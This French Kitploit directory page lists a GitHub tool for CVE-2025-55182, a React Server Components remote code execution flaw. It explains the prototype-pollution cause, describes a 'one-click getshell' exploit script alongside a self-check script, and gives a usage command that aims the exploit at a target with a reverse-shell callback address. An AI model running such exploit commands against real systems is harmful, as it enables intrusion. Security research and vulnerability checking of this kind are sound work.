Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — CVE-2025-55182 méthodes de détection et exploitation | Kitploit
Outils/GitHubGitHub/sun977/cve-2025-55182
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubsun977/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 méthodes de détection et exploitation

Voir le dépôt
12il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 RCE

Outil de vérification personnel pour vérifier la vulnérabilité CVE-2025-55182

Principe de la vulnérabilité

React Server Components présente un défaut de résolution de chemin lors du décodage des payloads envoyés aux points de terminaison des fonctions serveur. Il utilise le deux-points pour séparer les propriétés d'objet et réaliser un accès imbriqué (par exemple, $1🅰️b correspond à {}.a.b de {"a":{"b":"foo"}}), mais ne vérifie pas l'existence des propriétés. Lorsque $1🅰️a est passé, un accès invalide à {}.a.a est déclenché, provoquant une erreur 500 côté serveur ; un attaquant peut construire un payload spécial pour réaliser une pollution du prototype et une injection de code, permettant un RCE.

Description du répertoire

  • exp.py Code d'exploitation de la vulnérabilité (getshell en un clic)
  • cve-2025-55182-check.sh Outil d'auto-vérification de la vulnérabilité sur l'hôte

Méthode d'exploitation

root@kitploit:~
python3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444

Méthode d'auto-vérification

root@kitploit:~
CVE-2025-55182-Check.sh [-h] [-f <path>] [-a]
Télécharger l’outil

Avertissement de non-responsabilité

Cet outil est destiné uniquement à la recherche en sécurité, ne l'utilisez pas à des fins illégales.